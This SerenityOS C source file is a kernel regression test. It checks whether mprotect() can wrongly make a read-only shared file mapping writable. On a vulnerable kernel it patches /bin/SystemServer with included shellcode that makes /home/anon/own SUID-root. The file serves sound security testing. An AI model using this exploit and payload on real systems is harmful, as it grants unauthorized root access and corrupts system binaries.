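/*
 * Copyright (c) 2018-2020, the SerenityOS developers.
 *
 * SPDX-License-Identifier: BSD-2-Clause
 */

#include <AK/Types.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

// Length of the file-backed mapping taken over the head of /bin/SystemServer.
static constexpr size_t mapping_length = 16384;

// File offset of the bytes to overwrite: the start of sigchld_handler in the
// target binary, according to the payload comment below (0x0804b111 - 0x08048000).
static constexpr size_t patch_offset = 0x3111;

/*
 * Privilege-escalation regression demo.
 *
 * The target binary is opened O_RDONLY and mapped MAP_SHARED with PROT_READ
 * only; mprotect() is then asked to make that shared mapping writable. The
 * descriptor never granted write access, so POSIX requires the kernel to
 * refuse with EACCES. If the kernel does not refuse, the memcpy() below
 * modifies the shared pages and, because the mapping is MAP_SHARED, the
 * patched bytes are written back to /bin/SystemServer on disk, planting a
 * payload that runs as root the next time SystemServer's SIGCHLD handler is
 * invoked.
 *
 * Exit status:
 *   1 - open(), mmap() or mprotect() failed (mprotect() failing is the
 *       expected, secure outcome on a fixed kernel);
 *   0 - the write went through (prints "ok"): the kernel is vulnerable and
 *       the system binary has been modified.
 */
int main()
{
    int fd = open("/bin/SystemServer", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    u8* ptr = (u8*)mmap(nullptr, mapping_length, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        close(fd);
        return 1;
    }

    // This is the step a correct kernel must reject: upgrading a MAP_SHARED
    // mapping of a read-only descriptor to PROT_WRITE.
    if (mprotect(ptr, mapping_length, PROT_READ | PROT_WRITE) < 0) {
        perror("mprotect");
        munmap(ptr, mapping_length);
        close(fd);
        return 1;
    }

    /*
     *
     * This payload replaces the start of sigchld_handler in the /bin/SystemServer file.
     * It does two things:
     *
     *   chown ("/home/anon/own", 0, 0);
     *   chmod ("/home/anon/own", 04755);
     *
     * In other words, it turns "/home/anon/own" into a SUID-root executable! :^)
     *
     * Assembly source of the byte array below. `jmp $+17` skips the 2-byte jmp
     * itself plus the 15-byte NUL-terminated path (14 characters + NUL).
     * `2541` is 04755 in decimal. The syscalls are issued through the
     * `int 0x82` gate; the register assignment (eax = syscall number,
     * edx/ecx/ebx = arguments) and the numbers 79/67 follow the Serenity
     * kernel ABI of the time - verify against Kernel/API before reusing.
     * NOTE(review): the chmod call passes a length of 15 for a 14-character
     * path; presumably the terminator is included - confirm against the
     * kernel's sys$chmod argument handling.
     *
     */

#if 0
    [bits 32]
    [org 0x0804b111]
    jmp $+17
    path:
    db "/home/anon/own", 0
    mov eax, 79
    mov edx, path
    mov ecx, 0
    mov ebx, 0
    int 0x82
    mov eax, 67
    mov edx, path
    mov ecx, 15
    mov ebx, 2541
    int 0x82
    ret
#endif

    // Assembled form of the listing above. The 0x0804b113 immediates are the
    // address of `path` (org + 2); keep them in sync with patch_offset.
    const u8 payload[] = {
        0xeb, 0x0f, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x61, 0x6e, 0x6f,
        0x6e, 0x2f, 0x6f, 0x77, 0x6e, 0x00, 0xb8, 0x4f, 0x00, 0x00, 0x00,
        0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xbb,
        0x00, 0x00, 0x00, 0x00, 0xcd, 0x82, 0xb8, 0x43, 0x00, 0x00, 0x00,
        0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x0f, 0x00, 0x00, 0x00, 0xbb,
        0xed, 0x09, 0x00, 0x00, 0xcd, 0x82, 0xc3
    };

    // The write must stay inside the pages we mapped; anything past
    // mapping_length would be an out-of-bounds store, not a file write.
    static_assert(patch_offset + sizeof(payload) <= mapping_length, "payload must lie within the mapping");

    memcpy(&ptr[patch_offset], payload, sizeof(payload));

    // Reaching here means the kernel let the write through. Tear down the
    // mapping and descriptor explicitly rather than relying on process exit.
    munmap(ptr, mapping_length);
    close(fd);

    printf("ok\n");
    return 0;
}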